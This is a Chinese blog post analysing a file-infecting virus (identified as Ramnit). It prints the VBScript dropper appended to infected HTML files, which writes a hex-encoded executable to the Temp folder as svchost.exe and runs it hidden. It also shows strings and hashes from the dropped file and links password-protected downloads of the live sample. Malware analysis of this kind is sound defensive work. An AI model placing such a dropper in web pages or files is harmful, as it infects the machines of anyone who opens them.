文章目录

前言

最近发现电脑变慢,并且html文件末尾被自动添加VBS脚本。开始还以为是编辑器添加的,后来在今日头条上看到一篇文章介绍才知道是病毒。用360扫描,1W多个文件都被感染,包括DLL、HTML、EXE。怪不得每次打开迅雷的时候360就会报毒,原来是DLL文件被感染了。添加的脚本如下:

<SCRIPT Language=VBScript><!--
DropFileName = "svchost.exe"
WriteData = "4D5A90000300000004000000FFFF……"
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
//--></SCRIPT>

WrtieData就是它输出的病毒,有兴趣可以下载这个txt(密码7ppg)看一看。

一、病毒分析

【病毒名称】Virus.Win32.Ramnit.X

【作用】感染HTML、DLL、EXE文件,在末尾添加一段VBS脚本,一旦运行就会交叉感染。仅破坏了文件,没有上传东西,也不会被盗号(已经几个月了我才发现),但具体的邪恶作用还未知,在网上也查不到相关研究内容。这里我简单地看了下VBS语法的作用:

Set FSO = CreateObject("Scripting.FileSystemObject")

这句话估计是创建了文件操作系统对象。

DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName

GetSpecialFolder参数0代表Windows文件夹,1代表System文件夹,2代表Temp文件夹,于是去环境变量下找到了Temp文件夹,发现了创建的文件:

6.15号这天我到底干了什么,想不起来了……

If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If

如果文件不存在,就创建文件,并且每次取出WriteData的2位字符串变成十六进制长整型,再转为字符,写入文件。

Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0

执行这个EXE文件,就成功感染了。

用notepad++打开这个EXE文件,发现是乱码,但是底部有一些清晰的XML语句:

用在线网站格式化一下:

?t<?_??0?? ?P???8? ??G?t???WH??U?<? 	?t??????L? ??@? ?? ??   PTjSW???  €€`(XPTPSW?Xa?D$€j 9?u???€?>[?                                                                                    €   `  €                  8  €                 P   ?? ?                            x  €                 ?   €? h          ?` ?4   V S _ V E R S I O N _ I N F O     ???   * j = I * j = I ?                        8    S t r i n g F i l e I n f o       0 4 0 9 0 4 B 0   @ 	  C o m p a n y N a m e     S O F T W I N  S . R . L .     h   F i l e D e s c r i p t i o n     B i t D e f e n d e r  M a n a g e m e n t  C o n s o l e     < 	  F i l e V e r s i o n     1 0 6 . 4 2 . 7 3 . 6 1     4 
  I n t e r n a l N a m e   D67@N:HMI  8   L e g a l C o p y r i g h t   2 5 2 8 - 6 1 4 2   <   O r i g i n a l F i l e n a m e   n e d w p . e x e   0   P r o d u c t N a m e     ;N70=E    @   P r o d u c t V e r s i o n   1 0 6 . 4 2 . 7 3 . 6 1     D     V a r F i l e I n f o     $    T r a n s l a t i o n     	?xc <?xmlversion="1.0"encoding="UTF-8"standalone="yes"?>
<assemblyxmlns="urn:schemas-microsoft-com:asm.v1"manifestVersion="1.0">
?<trustInfoxmlns="urn:schemas-microsoft-com:asm.v3">
??<security>
???<requestedPrivileges><requestedExecutionLevellevel="asInvoker"uiAccess="false"/></requestedPrivileges>
??</security>
?</trustInfo>
</assembly>            d? 8?             q? T?             }? \?                     ?? ?? ?? ?? ?? ??     ??     ??     KERNEL32.DLL SHELL32.DLL USER32.DLL   LoadLibraryA  GetProcAddress  VirtualProtect  VirtualAlloc  VirtualFree   ExitProcess   DragFinish  WinHelpW

查了一下这些内容,中间的XML大致是获取管理员权限来运行,而底部的KERNEL32.DLL之类的语句则是加的壳避免被杀软杀掉,最上面的语句根据《What is desktoplayer.exe》发现一模一样:

The following is the available information on desktoplayer.exe:
Product name	??????
Company name	SOFTWIN S.R.L.
File description	BitDefender Management Console
Internal name	?????????
Original filename	nedwp.exe
Legal copyright	2528-6142
Product version	106.42.73.61
File version	106.42.73.61

但是它的MD5值和这个desktoplayer.exe不一样:

desktoplayer.exe
MD5	ff5e1f27193ce51eec318714ef038bef
SHA256	fd6c69c345f1e32924f0a5bb7393e191b393a78d58e2c6413b03ced7482f2320
svchost.exe
MD5    294102975fcfac1c15bf4ddbdab0e357
SHA1     87859c1266c86e3ab24c6df119f4a31d6902162f
SHA256     2ea0d44e7ff555c8d056ce209449c8f85d38ddc2bfe51498a35b07db4da4a4b8

但也估计是这类似的吧,分析到这里仍旧不清楚到底这个EXE干了什么事,如果你看到这篇文章有兴趣研究下去,请下载这个病毒文件看看:百度网盘下载(密码9d5n),如果双击运行是会感染的哦。

二、清除病毒的方法

使用赛门铁克的专杀工具清除病毒:   官网下载 |   百度网盘下载(密码wrmn),尝试过,无效。

使用360全盘防感染模式查杀,有效。


转载请注明出处http://www.bewindoweb.com/140.html | 三颗豆子
分享许可方式知识共享署名-非商业性使用-相同方式共享 4.0 国际许可协议
重大发现:转载注明原文网址的同学刚买了彩票就中奖,刚写完代码就跑通,刚转身就遇到了真爱。
你可能还会喜欢
具体问题具体杠